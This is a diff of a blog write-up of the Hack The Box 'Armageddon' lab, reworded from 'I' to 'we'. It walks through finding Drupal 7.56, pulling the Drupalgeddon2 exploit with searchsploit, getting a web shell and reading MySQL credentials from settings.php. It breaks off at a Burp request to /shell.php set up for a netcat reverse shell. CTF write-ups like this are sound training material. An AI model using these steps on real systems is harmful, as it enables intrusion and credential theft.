Nesousx/masoopy-web/content/posts/2021-07-31-HTB-Armageddon-without-MetaSploit..md

 Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds
 ```

-The above scans confirms I am facing a Linux box with only Apache and SSH running.
+The above scans confirms we are facing a Linux box with only Apache and SSH running.

 The `CHANGELOG.txt` shows a `Drupal 7.56` version :

 ![Drupal Version](/images/2021/07/Armageddon_Drupal_Version.png)

-After a quick look on [exploitDB](https://www.exploit-db.com/), I notice that this version should be vulnerable to `Drupalgeddon2`.
+After a quick look on [exploitDB](https://www.exploit-db.com/), we'll notice that this version should be vulnerable to `Drupalgeddon2`.

 Let's see!

 ## Exploitation
-I like to use searchsploit directly in my terminal, it makes it easier to show an exploit with `searchsploit -x relative_path` and `searchsploit -m relative_path` in order to mirror (eg. copy the exploit in my current directory).
+NB: I like to use searchsploit directly in my terminal, it makes it easier to show an exploit with `searchsploit -x relative_path` and `searchsploit -m relative_path` in order to mirror (eg. copy the exploit in my current directory).

-In my case, I'll by using : `searchsploit -m php/webapps/44449.rb`.
+In our case, we'll be using : `searchsploit -m php/webapps/44449.rb`.

 ### Getting Initial Shell
-After firing it up, I'll get a shell :
+After firing it up, we'll get a shell :

 ![Initial Shell](/images/2021/07/Armageddon_Initial_Shell.png)

-From here, I can get the Drupal config inside `sites/default/settings.php` and find `MySQL credentials` :
+From here, we can get the Drupal config inside `sites/default/settings.php` and find `MySQL credentials` :

 ![MySQL Credentials](/images/2021/07/Armageddon_Mysql_Creds.png)

-Once, I had the creds, I tried to dump the db, with `mysqldump`, but got an error about a bad character (>).
-This is when I decided to upgrade my shell.
+Once, we have the creds, we can try to dump the db, with `mysqldump`, but we'll gt an error about a bad character (>).
+We,then, shall upgrade our shell.

-I fired up `Burp`, with the following request and a `nc listener` :
+Let's fire up `Burp`, with the following request and a `nc listener` :

 ```text
 POST /shell.php HTTP/1.1